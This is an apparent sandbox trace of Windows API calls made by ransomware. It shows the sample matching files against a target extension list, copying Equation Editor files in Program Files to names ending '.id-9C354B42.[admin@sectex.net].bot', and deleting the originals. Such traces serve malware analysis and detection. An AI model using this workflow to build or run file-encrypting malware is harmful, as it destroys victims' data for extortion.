	[0050.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68
	[0050.862] lstrlenW (lpString=".doc") returned 4
	[0050.862] lstrcmpiW (lpString1=".doc", lpString2=".CNT") returned 1
	[0050.862] lstrlenW (lpString=".docx") returned 5
	[0050.862] lstrcmpiW (lpString1=".docx", lpString2="2.CNT") returned -1
	[0050.862] lstrlenW (lpString=".pdf") returned 4
	[0050.862] lstrcmpiW (lpString1=".pdf", lpString2=".CNT") returned 1
	[0050.862] lstrlenW (lpString=".xls") returned 4
	[0050.862] lstrcmpiW (lpString1=".xls", lpString2=".CNT") returned 1
	[0050.862] lstrlenW (lpString=".xlsx") returned 5
	[0050.862] lstrcmpiW (lpString1=".xlsx", lpString2="2.CNT") returned -1
	[0050.862] lstrlenW (lpString=".ppt") returned 4
	[0050.862] lstrcmpiW (lpString1=".ppt", lpString2=".CNT") returned 1
	[0050.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68
	[0050.862] lstrlenW (lpString=".zip") returned 4
	[0050.862] lstrcmpiW (lpString1=".zip", lpString2=".CNT") returned 1
	[0050.862] lstrlenW (lpString=".rar") returned 4
	[0050.862] lstrcmpiW (lpString1=".rar", lpString2=".CNT") returned 1
	[0050.862] lstrlenW (lpString=".bz2") returned 4
	[0050.862] lstrcmpiW (lpString1=".bz2", lpString2=".CNT") returned -1
	[0050.862] lstrlenW (lpString=".7z") returned 3
	[0050.863] lstrcmpiW (lpString1=".7z", lpString2="CNT") returned -1
	[0050.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68
	[0050.863] lstrlenW (lpString=".dbf") returned 4
	[0050.863] lstrcmpiW (lpString1=".dbf", lpString2=".CNT") returned 1
	[0050.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68
	[0050.863] lstrlenW (lpString=".1cd") returned 4
	[0050.863] lstrcmpiW (lpString1=".1cd", lpString2=".CNT") returned -1
	[0050.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68
	[0050.863] lstrlenW (lpString=".jpg") returned 4
	[0050.863] lstrcmpiW (lpString1=".jpg", lpString2=".CNT") returned 1
	[0050.863] lstrcmpiW (lpString1=".EXE", lpString2=".bot") returned 1
	[0050.863] lstrlenW (lpString="EQNEDT32.EXE") returned 12
	[0050.863] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.863] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=543304) returned 1
	[0050.863] CloseHandle (hObject=0x184) returned 1
	[0050.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe")) returned 0x20
	[0050.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.864] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.864] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.864] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.864] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0050.864] GetLastError () returned 0x0
	[0050.864] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x84a48, lpOverlapped=0x0) returned 1
	[0050.876] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x84a50, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x84a50, lpOverlapped=0x0) returned 1
	[0050.886] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0050.886] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0050.886] SetEndOfFile (hFile=0x1a8) returned 1
	[0050.886] CloseHandle (hObject=0x1a8) returned 1
	[0050.886] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.886] SetEndOfFile (hFile=0x184) returned 1
	[0050.891] CloseHandle (hObject=0x184) returned 1
	[0050.891] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0050.891] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe")) returned 1
	[0050.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68
	[0050.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68
	[0050.891] lstrlenW (lpString=".doc") returned 4
	[0050.891] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0050.891] lstrlenW (lpString=".docx") returned 5
	[0050.891] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1
	[0050.891] lstrlenW (lpString=".pdf") returned 4
	[0050.891] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0050.891] lstrlenW (lpString=".xls") returned 4
	[0050.891] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0050.891] lstrlenW (lpString=".xlsx") returned 5
	[0050.891] lstrcmpiW (lpString1=".xlsx", lpString2="2.EXE") returned -1
	[0050.892] lstrlenW (lpString=".ppt") returned 4
	[0050.892] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0050.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68
	[0050.892] lstrlenW (lpString=".zip") returned 4
	[0050.892] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0050.892] lstrlenW (lpString=".rar") returned 4
	[0050.892] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0050.892] lstrlenW (lpString=".bz2") returned 4
	[0050.892] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0050.892] lstrlenW (lpString=".7z") returned 3
	[0050.892] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0050.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68
	[0050.892] lstrlenW (lpString=".dbf") returned 4
	[0050.892] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0050.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68
	[0050.892] lstrlenW (lpString=".1cd") returned 4
	[0050.892] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0050.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68
	[0050.892] lstrlenW (lpString=".jpg") returned 4
	[0050.892] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0050.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68
	[0050.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68
	[0050.892] lstrlenW (lpString=".doc") returned 4
	[0050.892] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0050.892] lstrlenW (lpString=".docx") returned 5
	[0050.892] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1
	[0050.892] lstrlenW (lpString=".pdf") returned 4
	[0050.892] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0050.892] lstrlenW (lpString=".xls") returned 4
	[0050.892] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0050.892] lstrlenW (lpString=".xlsx") returned 5
	[0050.892] lstrcmpiW (lpString1=".xlsx", lpString2="2.EXE") returned -1
	[0050.892] lstrlenW (lpString=".ppt") returned 4
	[0050.892] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0050.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68
	[0050.893] lstrlenW (lpString=".zip") returned 4
	[0050.893] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0050.893] lstrlenW (lpString=".rar") returned 4
	[0050.893] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0050.893] lstrlenW (lpString=".bz2") returned 4
	[0050.893] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0050.893] lstrlenW (lpString=".7z") returned 3
	[0050.893] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0050.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68
	[0050.893] lstrlenW (lpString=".dbf") returned 4
	[0050.893] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0050.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68
	[0050.893] lstrlenW (lpString=".1cd") returned 4
	[0050.893] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0050.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68
	[0050.893] lstrlenW (lpString=".jpg") returned 4
	[0050.893] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0050.893] lstrcmpiW (lpString1=".manifest", lpString2=".bot") returned 1
	[0050.893] lstrlenW (lpString="eqnedt32.exe.manifest") returned 21
	[0050.893] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.894] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=566) returned 1
	[0050.894] CloseHandle (hObject=0x184) returned 1
	[0050.894] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest")) returned 0x20
	[0050.894] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.894] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.894] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.894] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.894] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0050.894] GetLastError () returned 0x0
	[0050.894] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x236, lpOverlapped=0x0) returned 1
	[0050.895] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x240, lpOverlapped=0x0) returned 1
	[0050.896] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0050.896] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xfe, lpOverlapped=0x0) returned 1
	[0050.896] SetEndOfFile (hFile=0x1a8) returned 1
	[0050.896] CloseHandle (hObject=0x1a8) returned 1
	[0050.896] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.896] SetEndOfFile (hFile=0x184) returned 1
	[0050.897] CloseHandle (hObject=0x184) returned 1
	[0050.897] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0050.897] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest")) returned 1
	[0050.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77
	[0050.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77
	[0050.898] lstrlenW (lpString=".doc") returned 4
	[0050.898] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1
	[0050.898] lstrlenW (lpString=".docx") returned 5
	[0050.898] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1
	[0050.898] lstrlenW (lpString=".pdf") returned 4
	[0050.898] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1
	[0050.898] lstrlenW (lpString=".xls") returned 4
	[0050.898] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1
	[0050.898] lstrlenW (lpString=".xlsx") returned 5
	[0050.898] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1
	[0050.898] lstrlenW (lpString=".ppt") returned 4
	[0050.898] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1
	[0050.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77
	[0050.898] lstrlenW (lpString=".zip") returned 4
	[0050.898] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1
	[0050.898] lstrlenW (lpString=".rar") returned 4
	[0050.898] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1
	[0050.898] lstrlenW (lpString=".bz2") returned 4
	[0050.898] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1
	[0050.898] lstrlenW (lpString=".7z") returned 3
	[0050.898] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1
	[0050.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77
	[0050.898] lstrlenW (lpString=".dbf") returned 4
	[0050.898] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1
	[0050.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77
	[0050.898] lstrlenW (lpString=".1cd") returned 4
	[0050.898] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1
	[0050.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77
	[0050.898] lstrlenW (lpString=".jpg") returned 4
	[0050.898] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1
	[0050.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77
	[0050.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77
	[0050.899] lstrlenW (lpString=".doc") returned 4
	[0050.899] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1
	[0050.899] lstrlenW (lpString=".docx") returned 5
	[0050.899] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1
	[0050.899] lstrlenW (lpString=".pdf") returned 4
	[0050.899] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1
	[0050.899] lstrlenW (lpString=".xls") returned 4
	[0050.899] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1
	[0050.899] lstrlenW (lpString=".xlsx") returned 5
	[0050.899] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1
	[0050.899] lstrlenW (lpString=".ppt") returned 4
	[0050.899] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1
	[0050.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77
	[0050.899] lstrlenW (lpString=".zip") returned 4
	[0050.899] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1
	[0050.899] lstrlenW (lpString=".rar") returned 4
	[0050.899] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1
	[0050.899] lstrlenW (lpString=".bz2") returned 4
	[0050.899] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1
	[0050.899] lstrlenW (lpString=".7z") returned 3
	[0050.899] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1
	[0050.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77
	[0050.899] lstrlenW (lpString=".dbf") returned 4
	[0050.899] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1
	[0050.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77
	[0050.899] lstrlenW (lpString=".1cd") returned 4
	[0050.899] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1
	[0050.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77
	[0050.899] lstrlenW (lpString=".jpg") returned 4
	[0050.899] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1
	[0050.900] lstrcmpiW (lpString1=".HLP", lpString2=".bot") returned 1
	[0050.900] lstrlenW (lpString="EQNEDT32.HLP") returned 12
	[0050.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.900] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=176311) returned 1
	[0050.900] CloseHandle (hObject=0x184) returned 1
	[0050.900] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp")) returned 0x20
	[0050.900] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0050.900] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.900] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0050.901] GetLastError () returned 0x0
	[0050.901] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x2b0b7, lpOverlapped=0x0) returned 1
	[0051.370] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x2b0c0, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x2b0c0, lpOverlapped=0x0) returned 1
	[0051.374] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0051.374] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0051.374] SetEndOfFile (hFile=0x1a8) returned 1
	[0051.374] CloseHandle (hObject=0x1a8) returned 1
	[0051.374] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.374] SetEndOfFile (hFile=0x184) returned 1
	[0051.376] CloseHandle (hObject=0x184) returned 1
	[0051.376] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0051.376] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp")) returned 1
	[0051.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68
	[0051.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68
	[0051.376] lstrlenW (lpString=".doc") returned 4
	[0051.377] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1
	[0051.377] lstrlenW (lpString=".docx") returned 5
	[0051.377] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1
	[0051.377] lstrlenW (lpString=".pdf") returned 4
	[0051.377] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1
	[0051.377] lstrlenW (lpString=".xls") returned 4
	[0051.377] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1
	[0051.377] lstrlenW (lpString=".xlsx") returned 5
	[0051.377] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1
	[0051.377] lstrlenW (lpString=".ppt") returned 4
	[0051.377] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1
	[0051.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68
	[0051.377] lstrlenW (lpString=".zip") returned 4
	[0051.377] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1
	[0051.377] lstrlenW (lpString=".rar") returned 4
	[0051.377] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1
	[0051.377] lstrlenW (lpString=".bz2") returned 4
	[0051.377] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1
	[0051.377] lstrlenW (lpString=".7z") returned 3
	[0051.377] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1
	[0051.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68
	[0051.377] lstrlenW (lpString=".dbf") returned 4
	[0051.377] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1
	[0051.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68
	[0051.377] lstrlenW (lpString=".1cd") returned 4
	[0051.377] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1
	[0051.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68
	[0051.377] lstrlenW (lpString=".jpg") returned 4
	[0051.378] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1
	[0051.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68
	[0051.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68
	[0051.378] lstrlenW (lpString=".doc") returned 4
	[0051.378] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1
